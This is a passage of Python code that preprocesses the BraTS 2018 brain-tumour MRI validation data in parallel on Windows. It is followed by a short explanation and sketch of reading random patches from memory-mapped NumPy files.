    brats_folder_with_downloaded_data = "C:/Users/JiachennCJC/Downloads/MICCAI_BraTS_2018_Data_Validation_new/"
    # list_of_lists = get_list_of_files(brats_folder_with_downloaded_train_data)
    list_of_lists = get_list_of_files_validation_2018(brats_folder_with_downloaded_data)
    maybe_mkdir_p(brats_preprocessed_folder)
    # patient_names = [i[0].split("/")[-2] for i in list_of_lists]
    # windows_patient_names = [i[0].split("\\")[2] for i in list_of_lists]
    windows_patient_names = [i[0].split("\\")[0].split("/")[-1] for i in list_of_lists]
    p = Pool(processes=num_threads_for_brats_example)
    # # p.starmap(load_and_preprocess, zip(list_of_lists, patient_names, [brats_preprocessed_folder] * len(list_of_lists)))
    # For windows systems
    p.starmap(load_and_preprocess, zip(list_of_lists, windows_patient_names, [brats_preprocessed_folder] * len(list_of_lists)))
    p.close()
    p.join()
    # # remember that we cropped the data before preprocessing. If we predict the test cases, we want to run the same
    # # preprocessing for them. We need to then put the segmentation back into its original position (due to cropping).
    # # Here is how you can do that:
    # # lets use Brats17_2013_0_1 for this example
    # img = np.load(join(brats_preprocessed_folder, "Brats17_2013_0_1.npy"))
    # metadata = load_pickle(join(brats_preprocessed_folder, "Brats17_2013_0_1.pkl"))
    # # remember that we changed the segmentation labels from 0, 1, 2, 4 to 0, 1, 2, 3. We need to change that back to
    # # get the correct format
    # img[-1][img[-1] == 3] = 4
    # save_segmentation_as_nifti(img[-1], metadata, join(brats_preprocessed_folder, "delete_me.nii.gz"))
```
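The comments in the `__main__` block explain why the preprocessed cases are stored as `.npy`: they can be opened with `np.load(..., mmap_mode="r")` so that only the voxels of the sampled patch are read from disk during training. Below is a hedged, standalone sketch of that pattern; the folder, patient name and patch size are made-up examples, not values taken from the script above.

```python
import os
import numpy as np

preprocessed_folder = "./brats_data_preprocessed"              # assumed output_folder
case_file = os.path.join(preprocessed_folder, "Brats17_2013_0_1.npy")

# memory-map the 4d array (modalities [+ segmentation], x, y, z); no voxel data is
# loaded yet, only the header is read
data = np.load(case_file, mmap_mode="r")

patch_size = (128, 128, 128)
# choose a random corner such that the patch fits inside the (possibly smaller) volume
lb = [np.random.randint(0, max(s - p, 0) + 1)
      for s, p in zip(data.shape[1:], patch_size)]
patch = np.array(data[:,
                      lb[0]:lb[0] + patch_size[0],
                      lb[1]:lb[1] + patch_size[1],
                      lb[2]:lb[2] + patch_size[2]])  # only this patch is copied into RAM
```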